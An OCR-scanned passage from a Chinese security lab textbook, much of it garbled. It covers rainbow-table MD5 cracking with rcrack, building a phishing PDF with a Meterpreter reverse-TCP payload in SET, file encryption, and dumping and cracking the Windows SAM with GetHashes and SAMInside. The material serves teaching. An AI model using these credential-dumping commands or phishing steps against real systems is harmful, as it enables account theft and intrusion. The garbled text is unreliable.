步骤 10: 使 用 “. /rcrack” 命 令 查看 rcrack 工具 的 帮助 文档 。 
F E 11. 本 实验 将 使 用 rcrack 工具 破解 abede 的 md5 散 列 
ab56b4d92b40713acc5af89985d4b786 ,如 图 1-34 所 示 。 
结果 (result) 为 abcde; 破 解 成 功 ,如 图 1-35 所 示 。 








e 
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^ v x root@bt: /pentest/passwords/rainbowcrack 
File Edit View Terminal Help 
t pentest/passwords/rainbowcracké 
t pentest/passwords/rainbowcrack# 
pentest/passwords/rainbowcrack# 
pentest/passwords/rainbowcracké 
pentest/passwords/rainbowcracké 
pentest/passwords/rainbowcracké 
pentest/passwords/rainbowcrack£ 
pentest/passwords/rainbowcracké 
pentest/passwords/rainbowcracké 
pentest/passwords, 
pentest/passwords, 
pentest/passwords, 
pentest/passwords, 
pentelt/passuprds/ 
к К 
А 
Website: http://proj 


rtsort rt files 
rtsort rt files X 
h to sort point, otherwise rainbow tables 
ed by end point 
t@bt: /pentest/passwor 


~ х root@bt: /pentest/passwords/rainbowcrack 
File Edit View Terminal Help 
test/passwords/rainbowcrack# ./rtsort md5 loweralpha#5-5 @ 
A 
loweralpha#5-5 0 
513. 16 by 
ding rainbow tab 
sorting rainbow table d point 
writing sorted rainbow table 


passwords/rainbowcrack# 
passwords/rainbowcrack# 
passwords/rainbowcrack# 
pentest/passwords/rainbowcrack# 
pentest/passwords/rginbowcgack# 
К е ТҮ РҮ 
беп $ "Ld QT 
рептефрабыйгйыг  һирыс facka 
words /rainbowc[acké 

words /rainbowcra 
pentest /passwords /rainbowcrack£ 
pentest/passwords/rainbowcrack# 


[a= root@bt: /pentest/passwords/rainbowcrack 
File Edit View Terminal Help 


rcrack * 


огу 
llocated for 

alpha#5-5 Ө 
loweralpha#5-5 

hash 

6b4d92b40 


Waterse" 
check 


A 1-34 使 用 rcrack 工具 破解 abcde 的 mds 散 列 值 


аг 
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^ v x root@bt: /pentest/passwords/rainbowcrack 
File Edit View Terminal Help 





图 1-35 显示 破解 后 的 结果 


1.4.4 任务 与 思 


出 于 安全 考虑 ,在 互联 网 上 的 应 用 系统 中 ,大 量 用 户 信 息 在 保存 到 数据 库 之 前 都 会 通过 
MD5 等 方式 进行 加 密 处 理 。 但 是 ,攻击 者 为 了 获得 大 量 的 用 户 信息 ,首先 通过 拖 库 方式 获 
得 用 户 被 MD5 加 密 后 的 信息 ,再 利用 彩虹 表 等 方式 进行 破解 。 

读者 在 本 实验 的 基础 上 ,通过 查阅 相关 资料 ,并 通过 具体 的 实验 ,进一步 操作 以 下 内 容 。 

(1) BackTrack 5 的 操作 方法 。 

D 拖 库 的 概念 及 实现 方法 。 

(3) MD5 算法 及 实现 方法 。 


1.5 电子 邮件 攻击 : 利用 社会 工程 学 工具 发 送 恶意 邮件 


1.5.1 预备 知识 : 社会 工程 学 与 电子 邮件 攻击 


1. 电子 邮件 攻击 

电子 邮件 攻击 是 一 种 专门 针对 电子 邮件 系统 的 DoS/DDoS 攻击 方式 。 由 于 电子 邮件 
在 互联 网 中 的 应 用 非常 普遍 ,同时 与 电子 邮件 相关 的 SNMP、POP3 和 IMAP 等 协议 在 设计 
上 都 存在 一 定 的 安全 漏洞 .因此 为 攻击 的 实施 提供 了 可 被 利用 的 资源 。 电 子 邮 件 攻击 有 很 
多 种 ,主要 表现 在 以 下 几 方 面 

COD 窃取 和 算 改 数据 。 通过 监听 数据 包 或 截取 正在 传输 的 信息 息 , 可 以 使 攻击 者 读 取 或 
修改 数据 。 通 过 网 络 监听 程序 实现 .在 Windows 系统 中 可 以 使 用 NetXRay, 在 UNIX 和 
Linux 系统 中 可 以 使 用 Tepdump ,另外 还 可 以 使 用 更 为 专业 的 Sniffer TH. 

(2) 伪造 邮件 。 通 过 伪造 的 电子 邮件 地 址 (尤其 是 发 件 人 地 址 ) 可 以 对 收 件 人 实施 诈骗 
攻击 。 
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(3) 拒绝 服务 。 让 系统 或 网 络 充斥 大 量 的 垃圾 邮件 ,从 而 没有 余力 去 处 理 其 他 的 事情 ， 
造成 系统 邮件 服务 器 或 网 络 的 瘫痪 。 

(4) 病毒 。 在 互联 网 环境 中 ,很 多 病毒 的 广泛 传播 是 通过 电子 邮件 实现 的 。 

2. 社会 工程 学 介绍 

社会 工程 学 是 利用 人 性 弱点 获取 目标 系统 有 价值 信息 的 系列 方法 , 它 是 一 种 欺骗 的 艺 
术 。 当 缺乏 目标 系统 的 可 用 信息 时 ,该 方法 是 渗透 测试 者 重要 的 手段 之 一 。 对 于 任何 组 织 
而 言 ,人 与 人 之 间 的 关联 既是 安全 措施 中 最 薄弱 的 一 环 , 也 是 整个 安全 基础 设施 最 脆弱 的 地 
方 。 作 为 社会 人 ,天 性 使 得 其 对 社会 工程 学 攻击 的 抵抗 力 不 强 。 社 会 工程 学 攻击 者 通常 利 
用 这 一 特点 ,获取 机 密 信息 或 受 限 数据 。 社 会 工程 学 的 实现 方式 多 种 多 样 ,而 且 每 种 方式 根 
据 采 用 方式 和 手段 的 不 同 , 取 得 的 效果 也 会 不 同 。 
1.5.2 实验 目的 和 条 件 


1. 实验 目的 


通过 本 实验 ,使 读者 在 熟悉 电子 邮件 系统 工作 原理 的 基础 上 ,结合 社会 工程 学 攻击 手 
段 ,学 习 电 子 邮 件 攻击 的 基本 原理 和 方法 。 


2. 实验 清单 及 软 硬 件 要 求 
本 实验 所 需要 的 软 硬 件 清单 如 表 1-5 所 示 。 
表 1-5 Nmap 工具 应 用 实验 清单 























类 = F 号 软 硬 件 要 求 я Жж 

1 数量 16 

кшй : aa TE нын Tools-Social 
3 软件 版 本 anie 

Engineering Tools 

1 数量 16 

Tg. 2 操作 系统 版 本 RedHat 
3 软件 版 本 无 











1.5.3 实验 过 程 


1. 登录 攻击 机 并 启动 社会 工程 学 攻击 工具 

主要 操作 过 程 如 下 。 

步 又 1: 登录 BT5 主机 (第 一 次 启动 目标 主机 时 ,还 需要 安装 Java 控件 ) 。 

步骤 2: 如 果 进 入 的 是 命令 行 模式 ,可 以 输入 “startx” 命 令 进入 图 形 界 面 。 对 于 Linux 
操作 不 是 很 熟悉 的 读者 ,建议 进入 图 形 界面 进行 相应 的 操作 。 

步骤 3: 进入 图 形 化 界面 后 ,选择 启动 BackTrack-Exploitation Tools-Social Engineering 
Toolkit-set 程序 ,如 图 1-36 所 示 。 

步骤 4: 提示 用 户 是 否 同意 服务 条 款 ,输入 “y” 命 令 表 示 同 意 ,随后 正常 启动 该 程序 ,如 
图 1-37 所 示 。 
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Ба Thu Jan 31, 10:44 PM 


~ x Terminal 
File Edit View Terminal Help 


rms, 
wing conditiU 


in binary form mus 
and the folli 


it nor the na 


derived Fron 


DED BY THE CORYRIGHT HOLDERS AND CONTRIBUTORS "Js IS" AND 
5 OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 
ИТТЕР TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNI 
R PURPOSE ARE DI MED. IN NO EVENT SHALL THE YRIGHT 
BE LIABLE FOR ANY D INDIRECT, 
S (INCLUDING, BUT NOT 


FOR A PARTICUL 
INCIDENTAL, CIAL, E 


, DATA, OR P| 








图 1-36 


^ * X Terminal 
File Edit View Terminal Help 


modify， long а 


the appropriate с 


ns giving aino it) 


buy im 


Do you agree to the terms of service 


01011001011011110111010100100000011100 








1-37 输入 “y” 命 令 同 意 服 务 条 款 





步骤 5: 接 下 来 有 7 个 选项 ,分 别 是 社会 工程 学 攻击 (Social-Engineering Attacks) ,快速 
通道 渗透 测试 (Fast-Track Penetration Testing) ,第 三 方 模块 (Third Party Modules) .更 新 
metasploit( Update the Metasploit Framework)、 更 新 社会 工程 学 工具 包 (Update the 
Social-Engineer Toolkit) 、 更 新 该 程序 设置 选项 (Update SET configuration) , # В (Help, 
Credits,and About) ,如 图 1-38 所 示 。 
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^ v x Te nal 
File Edit View Terminal Help 
https://ww.trustedsec.com 


Welcome to the r Toolkit (SET)-—Yewr-ang. 
stop shop for al your social-engineering needs. 


The Social-Engineer Toolkit is a product of TrustedSec. 


Visit: https://www.trustedsec.com 


"ai amr 9 277 
Third райым є 
Update the 5 
Update the 











图 1-38 BTS 功能 选项 列表 


行 社会 工程 学 攻击 
主要 操作 过 程 如 下 。 

步骤 1: 由 于 本 实验 需要 进行 社会 工程 学 攻击 ,因此 在 图 1-38 中 选择 Social-Engineering 
Attacks 选项 。 

在 接 下 来 的 窗口 中 ,出 现 了 3 个 选项 ,如 图 1-39 所 示 , 分别 是 执行 一 次 邮件 攻击 
(Perform a Mass Email Attack) 、 创 建 一 个 文件 格式 负荷 (Create a FileFormat Payload) 和 
创建 一 个 社会 工程 学 模板 (Create a Social-Engineering Template) 。 在 本 实验 中 ,需要 进行 
邮件 攻击 ,所 以 选择 Perform a Mass Email Attack 选项 。 


x Terminal 
File Edit View Terminal Help 
9) Return back to the main menu 


> 1 


Spearphishing modul 
attaehëd fil 
EI], ETT 
nfifset СОМ. SENDM 


wet апа TBeetngsasr do 
ur own FibePbemat 


3: Atfack 
Por la рау load 
L-Engineefing Templ 


л Menu 


loit you want. 








图 1-39 选择 攻击 方式 
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步骤 2: 进入 负荷 选项 ,共有 16 项 ,如 图 1-40 所 示 , 分 别 是 DLL 注入 攻击 ,文档 UNC 
LM SMB i ,缓冲 溢出 攻击 等 。 在 本 实验 中 选择 Adobe PDF Embedded EXE Social 
Engineering 选项 , 即 选择 “PDF 文件 社会 工程 学 ”。 














^ v X Terminal 
File Edit view Terminal Help 


you want 
EXE 


* PAYLOADS * 


SET Custom Written DLL Hi g Áttack Vector (RfR, ZIP 

om Written Docume Capture Аф аск 

ack Buffer 
oft Word ВТЕ с ffer 0 low Wussos082) 
) Adobe Flash P ayer Button" 

Adgbe {Туре SING Table "uniqueN 
I "d payé 2 обот оме ig, ad e: ufe 
ла бе озады 28 diii N: I S L Gak! 
две? С 


11) А 

12) Айо 

13) Custom ЕХЕ to VBA 
14) 3D CLODPr 
15) PDF En 

16) Foxit PDF Ri 








图 1-40 负荷 选择 列表 


步骤 3: PDF 攻击 类 型 有 两 种 ,分 别 是 用 自己 的 PDF 文件 攻击 还 是 用 系统 内 置 的 PDF 
攻击 ,如 图 1-41 所 示 。 在 本 实验 中 选择 Use built-in BLANK PDF for attack 选项 , 即 “ 用 系 
统 内 置 的 PDF 攻击 ”。 








Е х Terminal 
File Edit View Terminal Help 
) MSCOMCTL 


[-] ault /load c € SET will gengrate a normal PDF with embed 
ded EXE 


built-in BLANK PDF for 


aT CPssh атала sheyt-or Victim ‘qnd| 


Samh За ргетег shèt on victim 


nect back to the attacker 


payload 





图 1-41 选择 PDF 攻击 类 型 





步骤 4: 系统 要 求 攻 击 者 选择 shell 负荷 的 类 型 ,如 图 1-42 所 示 ,这 些 shell 负荷 都 是 反 
弹 到 本 地 的 负荷 。 本 实验 中 选择 Windows Meterpreter Reverse-TCP and send back to 
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attacker 选项 , 即 利 用 Meterpreter 与 目标 建立 后 门 联系 。 


| > ~ * Terminal 
File Edit View Terminal Help 
Use built-in BLANK PDF for att 


1) Windows Reverse TCP Shell Spawr Coiiaiihett on victim and 
send 

2) Window eterp e Spawff а пеїегргец sheaanvyictim 

3) ий х е | a VNC 


Comma Mashaka 


TGP (X64 nect back to їџетаттагкега Wi nto 


УТ” кей рабай ahd Ere an accep 
n r&mote sys t Bn. 
Meter Tunnel communicafqon"Óvef HTTP usin 


> ІР addr for the payload l 
[!] Invalid try again 








图 1-42 选择 shell 负荷 的 类 型 


步骤 5: shell 将 返回 连接 的 地 址 ,本 实验 输入 的 IP 地 址 是 192. 168. 142. 134 ,端口 默认 
为 443( 也 可 以 更 改 为 其 他 端口 ,一 般 使 用 默认 的 443 ,因为 很 多 网 站 都 使 用 该 端口 ,所 以 对 
方 一 般 较 难 分 析出 来 ) 。 

步骤 6. 随后 是 系统 创建 文件 的 过 程 , 名 称 为 template. pdf。 文 件 创建 完成 后 ,系统 提 
示 是 否 修改 文件 名 ,如 图 1-43 所 示 。 其 中 “Keep the filename,I don't care. "是 保持 原名 ， 
“Rename the file.I want to be cool. ”是 修改 文件 名 。 如 果 是 在 真实 的 网 络 攻击 环境 中 , 攻 
击 者 一 般 会 更 改 文件 名 ,以 迷惑 被 攻击 者 。 本 实 
选项 ,保持 原名 。 


Terminal 
File Edit View Terminal Help 


[!] Invalid ip address try again 142.1 
а to connect Баск оп 1 








验 选 择 “Keep the filename, I don't care. " 





ayload cre 
] All payload: to the t *TC7progwam junk/template 


an added bonus, use the file-format créator in SET to freate your Wta 


Do you мап а 


LU Еп MI - D DE 


[*] Keeping the fil 


l Engineer Toolkit M M > 


图 1-43 显示 返回 地 址 并 选择 是 否 修改 文件 名 
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步骤 7: 让 用 户 选 择 邮 件 模板 ,有 预定 义 模板 (Pre-Defined Template) 和 随机 生成 的 
次 性 模板 (One-Time Use Email Template) 两 种 类 型 ,本 实验 中 选择 Pre-Defined Template 
选项 ,即使 用 预定 义 模块 ,如 图 1-44 所 示 。 


^ x Terminal 
File Edit View Terminal Help 


99. Return to main menu 


>1 


: WOAAAA!!!! 
: Baby Pics 





Send email to:1116. 





图 1-44 选择 邮件 模板 类 型 
步骤 8: 要 求 用 户 选 择 预 定义 的 模板 。 系 统 提 供 了 10 个 模板 ,本 实 


Brown's Angels ë. Demons 选项 。 
步骤 9: 系统 提示 输入 对 方 (被 攻击 者 ) 的 邮件 地 址 ,以 及 自己 的 邮箱 地 址 和 密码 ,然后 
H ELSE sendmail 将 邮件 发 送 , 如 图 1-45 所 示 。 





验 选 择 Dan 


= 
^ v х Terminal 
File Edit View Terminal Help 
Dan Brown 
: Strange interne e from your computer 
te 
Report 


long has it 


ДАА!!!!!!!!!! Thi 


18 


Flag this m 


(return) to view error mes 





图 1-45 选择 预定 义 模板 类 型 及 使 用 设置 收发 邮箱 
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随后 ,攻击 者 根据 已 有 的 设置 方式 ,将 攻击 邮箱 发 送 到 被 攻击 者 的 邮箱 中 。 
1.5.4 任务 与 思考 


用 社会 工程 学 进行 攻击 的 过 程 没 有 通用 的 方法 ,但 是 ,社会 工程 学 有 一 些 基本 步骤 需要 
读者 掌握 。 其 中 ,情报 收集 ,确定 漏洞 点 、 规 划 攻 击 和 执行 攻击 通常 是 社会 工程 学 攻击 者 采 
用 的 基本 步 又, 这些 步 骤 可 有 效 地 获取 目标 信息 或 访问 权限 。 

根据 《网络 攻击 与 防御 技术 ) 一 书 的 内 容 及 查阅 的 相关 文献 ,结合 社会 工程 学 攻击 的 实 
施 特点 ,读者 要 进一步 学 习 情 报 收集 、 确 定 漏洞 点 、 规 划 攻 击 和 执行 攻击 4 个 环节 的 特点 和 
具体 内 容 。 
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经 过 多 年 的 发 展 , Windows 操作 系统 的 功能 得 到 不 断 的 丰富 和 完善 ,目前 在 桌面 操作 
系统 中 已 占有 绝对 优势 ,而 且 许 多 互联 网 应 用 系统 也 运行 在 Windows 服务 器 操作 系统 上 。 
随 着 Windows 操作 系统 的 广泛 应 用 ,各 类 安全 漏洞 被 利用 的 现象 频繁 发 生 , 安 全 已 经 成 为 
影响 Windows 操作 系统 应 用 的 一 个 主要 因素 。 本 章 通过 相关 的 实验 使 读者 掌握 针对 
Windows 操作 系统 的 主要 攻击 和 防范 方法 。 





2.1 数据 处 理 安全 : 文件 加 密 


数据 处 理 安全 主要 涉及 在 数据 处 理 过 程 中 的 各 个 环节 ,其 目的 是 对 数据 的 安全 性 进行 
管理 ,以 防止 攻击 者 窃取 数据 或 造成 数据 泄露 。 


2.1.1 预备 知识 : 数据 加 密 


数据 加 密 是 针对 数据 的 可 首 转 换 , 即 借助 加 密 工 具 对 数据 进行 可 逆 加 密 转 换 , 并 将 验证 
口令 以 不 可 递 算法 加 密 后 写 入 文件 中 。 通 过 加 密 , 可 以 实现 介质 中 存储 的 数据 或 网 络 节点 
之 间 传 输 数 据 的 机 密 性 和 完整 性 。 加 密 是 对 访问 控制 方法 的 一 种 补充 ,对 笔记 本 电脑 ,智能 
手机 等 易 丢 失 设 备 上 的 数据 或 网 络 中 的 共享 文件 ,可 以 通过 加 密 进 行 有 效 的 保护 。 针 对 
Windows 相应 版 本 的 EFS(Encrypting File System, 加 密 文件 系统 ) 和 BitLocker 技术 ,都 是 
通过 加 密 技术 实现 的 。 


2.1.2 实验 目的 和 条 件 








1. 实验 目的 

通过 本 实验 ,在 回顾 数据 加 密 的 相关 算法 和 实现 过 程 的 基础 上 ,以 目前 普遍 使 用 的 
Windows 应 用 环境 为 基础 ,通过 Idoo File Encryption 工具 应 用 方法 的 介绍 ,使 读者 掌握 数 
据 加 密 的 实现 方法 ,培养 读者 对 重要 数据 进行 加 密 管理 的 良好 习惯 。 

2. 实验 条 件 

本 实验 仅 需 要 一 台 运 行 Windows XP 及 以 上 版 本 的 计算 机 ,该 计算 机 既 可 以 是 一 台 
理 机 ,也 可 以 是 一 台 虚 拟 机 ,同时 还 需要 提供 Idoo File Encryption 加 密 工 具 。 


2.1.3 实验 过 程 


步骤 1: 登录 实验 操作 系统 (本 例 为 Windows ХР). 
步骤 2: 安装 Idoo File Encryption 工具 软件 。 读 者 可 根据 安装 引导 说 明 完 成 安装 和 基 
本 配置 工作 ,只 是 在 出 现 如 图 2-1 所 示 的 对 话 框 时 ,需要 分 别 在 Type a password 和 Retype 
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your password 文本 框 内 输入 并 确认 Idoo File Encryption 工具 的 管理 密码 。 

完成 Idoo File Encryption 工具 的 安装 后 ,建议 在 桌面 创建 一 个 快捷 方式 。 

步骤 3: 运行 Idoo File Encryption ,在 出 现 的 对 话 框 中 输入 在 图 2-1 中 设置 的 管理 密 
码 , 单 击 OK 按钮 进行 确认 ,如 图 2-2 所 示 。 




































































Creating a password is a smart security precaution that protect 
your user account from unwanted users Be sure to remember 
your password or keep t in a safe place 
Туре a password: 
Retype your password: 
= 一- 
F you type youremai address you can use t retrieve the J оо File encryption Free 5.6 
forgotten password when you forget the password 
Email address:(Option) LO: 
ч 
Retype email address: 
Forgot the program's password? Retrieve Password 
Ce Cm) entem [mtm mts 
图 2-1 输入 并 确认 Idoo File Encryption 图 2-2 输入 管理 密码 
工具 的 管理 密码 


步骤 4: 当 正 确 输入 密码 后 ,进入 如 图 2-3 所 示 的 Idoo File Encryption 操作 界面 。 


Lock Data > Lock Folders 


О Please add folders to the ist below, then dick the "Lock Folders" button to comolete the operation 
of loding folders. 


= 
= 
Add Folders 


Folders 
































2-3 14оо File Encryption 操作 界面 


步骤 5: 在 桌面 新 建 一 个 名 称 为 text. txt 的 文档 (文档 名 自 定 ) ,输入 一 些 信息 (如 输入 
test) ,并 进行 保存 ,如 图 2-4 所 示 。 
步骤 6: 在 Idoo File Encryption 运行 界面 中 选择 Lock Files 一 Add Files 选项 ,添加 刚 
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图 2-4 创建 一 个 内 容 和 名 称 都 为 test 的 . txt 文 档 


才 创 建 的 test. txt 文档 。 
步骤 7: 单 击 Lock Files 按钮 ,开始 对 text. txt 文件 进行 加 密 , 如 图 2-5 所 示 。 





Lock Data > Lock Files 
° | 





Fles | Ststus 
EZ c: pocuments and Settngs Administrator UÑ ес Normal 








[ 
| 
| 
| 
| 
| 
| 
| 





Select: None All AllLocked AllNormal 





图 2-5 对 文件 进行 加 密 操 作 


如 果 出 现 如 图 2-6 所 示 的 提示 信息 ,说 明 该 文件 已 经 加 密 ( 上 锁 )。 
步骤 8: 通过 以 上 加 密 操 作 后 , 当 再 次 打开 test. txt 文件 时 ,将 会 出 现 如 图 2-7 所 示 的 
提示 信息 ,说 明 该 文件 已 经 被 加 密 , 无 法 直接 访问 。 





图 2-6 文件 成 功 加密 后 的 提示 信息 图 2-7 拒绝 访问 提示 信息 


2.1.4 任务 与 思考 


Windows 操作 系统 提供 了 如 下 加 密 方式 。 
CD 利用 组 策略 工具 把 存放 隐私 资料 .重要 文件 的 硬盘 分 区 设置 为 授权 访问 方式 。 
(2) 利用 注册 表 中 的 设置 ,把 某 些 驱动 器 设置 为 隐藏 。 
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(3) 利用 Windows 自 带 的 “磁盘 管理 组件 也 可 以 实现 硬盘 隐藏 。 
(4) 利用 WinRAR 等 工具 可 以 比较 安全 地 为 用 户 的 数据 进行 加 密 。 
(5) 利用 EFS 加 密 和 解密 。 

(6) 利用 Bitlocker 加 密 Windows 系统 中 的 数据 。 

(7) 利用 其 他 工具 进行 加 密 。 

请 读者 通过 实验 ,分 别 掌 握 以 上 几 种 文件 加 密 方式 。 


2.2 Windows 口令 破解 


在 Windows 操作 系统 中 ,用 户 账 户 的 安全 管理 使 用 了 安全 账号 管理 器 (Security 
Account Manager,SAM) 机 制 。 实 现 对 SAM 文件 的 管理 是 确保 Windows 系统 账户 安全 的 
基础 。 


2.2.1 预备 知识 : 获取 SAM 文件 的 内 容 


在 Windows 操作 系统 启动 后 ,因为 SAM 文件 开始 被 系统 调用 ,所 以 无 法 直接 复制 。 
但 是 可 以 使 用 reg save hkImNsam sam. hive 命令 先 将 SAM 文件 备份 后 再 进行 复制 ,然后 再 
利用 一 些 工 具 软 件 破 解 SAM 文件 的 内 容 。 常 用 的 SAM 破解 工具 软件 主要 有 LCS. 
l0phtcrack .WMIcrack .SMBcerack 等 。 

当 用 户 忘 记 了 Windows 的 登录 密码 时 ,可 以 先进 入 Windows 安全 模式 或 借助 
Windows PE 工具 进入 系统 ,然后 删除 系统 盘 目 录 下 的 SAM 文件 , 当 重 新 启动 系统 时 可 重 
置 Windows 的 登录 密码 。 

SAM 是 Windows 的 用 户 账户 数据 库 , 所 有 系统 用 户 的 账户 名 称 和 对 应 密码 等 相关 信 
息 都 保存 在 这 个 文件 中 。 其 中 ,用 户 名 和 口令 经 过 Hash 变换 后 以 Hash 列表 形式 保存 在 % 
SystemRoot\system32\config 文件 夹 下 的 SAM 文件 中 。 在 注册 表 中 ,SAM 文件 的 数据 保 
存在 HKEY LOCAL МАСНІМЕ\ЅАМ\ЅАМ 和 HKEY_LOCAL_MACHINE\Security\ 
SAM 分 支 下 ,默认 情况 下 被 隐藏 。 

由 于 SAM 文件 的 重要 性 ,系统 默认 会 对 SAM 文件 进行 备份 。 对 于 Windows Vista 之 
前 的 系统 ,SAM 备份 系统 存放 在 % SystemRoot% \ repair 文件 夹 下 。 对 于 Windows Vista 
及 其 之 后 的 系统 ,SAM 备份 文件 存放 在 %SystemRoot%\system32\config\RegBack 文件 
3e. Ps 

GetHashes 是 InsidePro 公司 早期 的 一 款 Hash 密码 获取 软件 ,可 以 获取 Windows Ж 
统 的 Hash 密码 值 。 另 外 ,该 公司 还 有 SAMInside、PasswordsPro 及 Extreme GPU 
Bruteforcer 3 款 密码 破解 软件 。GetHashes 命令 使 用 的 格式 为 








GetHashes [ System key file] or GetHashes $ Local 


其 中 ,一 般 使 用 “GetHashes $ Local” 获 取 系 统 的 Hash. 密码 值 ,该 命令 仅 在 System 权限 下 
才能 执行 。 
多 数 的 Windows 密码 恢复 软件 都 是 将 Windows 用 户 密 码 重 置 ,而 SAMInside 则 是 将 
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用 户 密 码 以 可 阅读 的 明文 方式 破解 出 来 ,而 且 SAMInside 可 以 使 用 分 布 式 攻击 方式 ,同时 
使 用 多 台 计 算 机 进行 密码 的 破解 ,大 大 提高 了 破解 速度 。 


2.2.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 重点 掌握 以 下 的 内 容 。 

(1) 学 习 Windows 口令 破解 的 原理 。 

(2) 熟练 使 用 Windows 口令 破解 工具 破解 SAM 文件 。 

2. 实验 清单 及 软 硬 件 要 求 

本 实验 需要 一 台 运 行 Windows Server 2003 的 计算 机 ,通过 实验 恢复 该 操作 系统 
Administrator 的 登录 密码 。 在 具体 实验 之 前 ,需要 在 该 计算 机 上 安装 Java 环境 。 另 外 ,还 
需要 准备 Hash 密码 获取 软件 GetHashes 和 Windows 密码 破解 (恢复 ) 软 件 SAMInside。 





2.2.3 实验 过 程 


在 进行 具体 的 实验 之 前 ,需要 将 事先 准备 的 软件 GetHashes 和 SAMInside 复制 到 系统 
首 定 的 文件 夹 中 ,本 实验 为 D:\tools\ 文 件 夹 。 

步骤 1: 登录 Windows Server 2003 操作 系统 。 

步骤 2: 选择 “开始 ”一 “运行 ”命令 ,在 出 现 的 对 话 框 中 输入 “cmd” 命 令 , 进 入 命令 提示 
符 操作 窗口 。 

步骤 3: 切换 到 D:\tools\ 文 件 夹 

步骤 4: 使 用 命令 “Gethashes. exe $1ocal” 获 取 本 地 SAM 表 , 如 图 2-8 所 示 。 


-exe $local 
AAEPCF1640B921CñRR0D3B435BS1404EE: 32ED87?BDBSFDCSE9CBñ8854737681 


1 :RRD3B435B51484EERñD3B435B51484EE: 31D6CFEGD1 6RE931B73C59 D7EGCOR9 CI 
-388945a0: 1001 :80D3B435B51404EERRD3B435B51404EE : 46018 FBB1 F5506 F70CC; 





2-8 获取 本 地 SAM Ж 
步骤 5: 使 用 命令 “Gethashes. exe $ local > dump. txt" fff SAM RFA dump. txt X 
件 , 如 图 2-9 所 示 。 


D: \tools>GetHashes.exe $1ocal > dunp.txt 





图 2-9 将 SAM 表 导 入 dump. txt 文件 





步骤 6: 切换 到 SAMInside 的 文件 夹 D:\tools\saminside. v2. 6. 1. 0. chs, 如 图 2-10 
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2013-5-10 10:46 
2013-5-10 10:46 
Tons 
(E) Charset. txt 2007-2-8 20:21 
国 Deseript ion 2001-8-20 23:12 
E History Eng. txt 2007-8-12 17:32 
E] History. Rus. txt 2007-8-12 17:40 
(Russian. kbt 2006-3-24 19:00 
Тасі de. chm 2. 2007-5-30 21:06 
(E) SMMInsi de. DIC. 2010-9-22 8:48 
BüsSMInside exe 2007-8-12 17:27 
SMlInsi de. Hashes 2013-5-10 10:46 
SAMInside INI 配置 设置 2013-5-10 10:46 
SNITnside INT. Dictionaries 2010-9-22 23:04 
SMIInsi de. key 2007-8-12 18:36 
未 来 软件 园 -首页 2006-7-20 22:26 
下 载 安装 说 明 .txt 2001-10-19 9:41 


Ñ 





MOI 





[n \чөйз\зөчазнїш... | 
图 2-10 SAMInside 工具 的 组 成 文件 
步骤 7: 双击 SAMInside. exe 文件 ,打开 如 图 2-11 所 示 的 SAMInside 工具 操作 窗口 。 





mmm 
Eu 


123 


menm 2222222222227? 
02227297777? 
? 














图 2-11 SAMInside 工具 操作 窗口 


步骤 8: 选择 "文件 ”从 PWDUMP 文件 导入 ”选项 ,如 图 2-12 所 示 。 
步骤 9: 在 弹出 的 选择 PWDUMP file 的 窗口 中 ,选取 在 图 2-9 中 生成 的 dump. txt 
ЖР. 
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25 A зм 和 ттн 注册 表 文件 导入 D... Сью 
从 san 注册 素 文件 和 用 系统 窗外 文件 导入 到 ) 





使 用 Las 导入 本 地 用 户 
使 用 计划 任务 导入 本 地 用 户 W 


| wwhome 
123 
р: == 7777777777777? 





Аеш 文件 导入 
从 * ISI 输入 文件 


Ы 导出 用 户 到 Pur ЖР)... 


导出 先 定 用户 到 pow AW. 
І 用 rmt 格 式 导出 用 户 吕 . 


导出 已 找到 的 密码 D，. 
统计 输出 o... 


ВН QO 

















图 2-12 选择 “文件 ”>“ 从 PWDUMP 文件 导入 ”选项 


步骤 10: 然后 ,Windows Server 2003 操作 系统 中 Administrator 用 户 账号 的 密码 将 被 
恢复 ,如 图 2-13 所 示 。 


(7799777777979? 

R> nmm 
< 禁用 > 2222222727777? 

| WWHOME | wwhome 

123 123 

omenmm 72727777777777 
< 禁用 > 2227227227370? 


E mmm | оз 


7777??? 777979? C 624AAC413795CDC1... CS. 


< 空 > 
回 suppoRT_388945a0 1001 <=> nemmm 





图 2-13 显示 已 经 被 破解 (恢复 ) 的 Administrator 用 户 账号 的 登录 密码 


2.2.4 任务 与 思考 

在 完成 本 实验 的 基础 上 ,请 读者 继续 学 习 以 下 的 内 容 , 掌 握 Windows 操作 系统 中 有 关 
Hash 密码 的 相关 知识 。 

1. Windows 操作 系统 下 的 Hash 密码 格式 


Windows 操作 系统 下 的 Hash 密码 格式 为 : 用 户 名 称 为 RID; LM-Hash 值 为 NT-Hash 
值 。 例 如 : 
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Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC 


其 中 ,用 户 名 称 为 Administrator; RID 为 500; LM-Hash 值 为 C8825DB10F2590EAAAD- 
3B435B51404EE; NT-Hash 值 为 683020925C5D8569C23AA724774CE6CC。 

2. Windows 操作 系统 下 LM-Hash 值 的 生成 原理 

Windows 操作 系统 下 Hash 值 的 生成 有 一 定 的 规则 。 假 设 Windows 操作 系统 登录 口 
令 的 明文 是 Welcome, 当 Windows 操作 系统 将 其 生成 Hash 值 时 ,需要 通过 以 下 5 个 步骤 
的 转换 。 

步骤 1: 将 原来 的 明文 口令 Welcome 全 部 转换 成 大 写字 符 串 WELCOME; 

步骤 2: 将 步骤 1 中 生成 的 大 写字 符 串 转换 为 二 进 制 串 , 即 ， 


WELCOME—-57454C434F4D4500000000000000 


提示 : 读者 可 以 将 明文 口令 复制 到 UltraEdit 编辑 器 中 ,使 用 二 进 制 方式 查看 , 即 可 获 
取 口 令 的 二 进 制 串 。 

步骤 3: 如 果 明 文 口令 经 过 大 写 变 换 后 进 制 字符 串 不 足 14B, 则 需要 在 其 后 添加 
0x00 补足 14B。 然 后 将 14B 的 二 进 制 字 СЕ 7B 的 数据 ,分 别 经 str to. key ОЮ 
处 理 得 到 两 组 SD 数据 。 


57454C434F4D45 经 str_to_key( ) 处 理 后 得 到 56A25288347A348A 
00000000000000 经 str_to_key() 处 理 后 得 到 0000000000000000 


步骤 4: 这 两 组 8B 数据 将 作为 DESKEY 对 魔术 字符 串 “KGS! @ # $ "ТИЕ 
DES 加 密 , 且 “KGS! @#$%” 对 应 4B47532140232425。 其 中 : 


56A25288347A348A 对 4B47532140232425 进行 标准 DES 加 密 得 到 C23413A8A1E7665F 
